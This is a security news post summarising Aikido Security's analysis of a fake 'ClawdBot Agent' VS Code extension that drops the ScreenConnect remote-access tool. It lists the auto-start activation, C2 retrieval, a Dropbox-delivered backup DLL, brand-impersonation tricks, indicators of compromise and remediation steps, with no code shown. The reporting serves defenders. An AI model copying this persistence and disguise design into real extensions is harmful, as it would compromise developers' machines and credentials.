February 7, 2026

Bulwark Black LLC

Cyber Security | Software Development | Consulting Services

RSS

Fake Clawdbot VS Code Extension Deploys ScreenConnect RAT

acint02 mins

Source: Aikido Security

On January 27, 2026, Aikido Security’s malware detection system flagged a malicious VS Code extension called “ClawdBot Agent” that functions as a fully operational trojan. The extension presents itself as a legitimate AI coding assistant while silently deploying ScreenConnect RAT on Windows machines the moment VS Code launches.

The Attack Vector

The fake extension impersonates the legitimate Clawdbot AI assistant, which has gained significant popularity in the developer community. The attackers claimed the name on the VS Code marketplace before the real Clawdbot team published an official extension.

What makes this attack particularly dangerous is that the extension actually works as an AI coding assistant, integrating with seven different AI providers including OpenAI, Anthropic, and Google. This functionality ensures users have no reason to suspect malicious activity.

Technical Analysis

The extension uses the onStartupFinished activation event, meaning it runs automatically every time VS Code starts without user interaction. The malicious initCore() function fetches configuration from a C2 server and downloads the payload.

Key technical findings:

  • Payload: Legitimate ScreenConnect (ConnectWise) software configured to connect to attacker infrastructure at meeting.bulletmailer[.]net:8041
  • Backup Mechanism: Rust-based DWrite.dll provides redundant payload delivery via Dropbox, disguised as a Zoom update
  • Staging: Files dropped to %TEMP%\Lightshot directory
  • Process Camouflage: Payload runs as Code.exe, blending with legitimate VS Code processes

Quadruple Impersonation

The attackers employed multiple layers of brand impersonation to avoid detection:

  1. Clawdbot – Extension name
  2. VS Code – Payload executable name (Code.exe)
  3. Lightshot – Staging folder name
  4. Zoom – Dropbox payload disguise

Remediation

If you installed the “ClawdBot Agent” extension:

  • Uninstall the extension immediately from VS Code
  • Check for and remove ScreenConnect installation at C:\Program Files (x86)\ScreenConnect Client\
  • Delete %TEMP%\Lightshot folder
  • Block meeting.bulletmailer[.]net at your firewall
  • Rotate any API keys entered into the extension
  • Run a full antivirus scan

Microsoft has since removed the malicious extension from the VS Code marketplace following Aikido’s report.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related News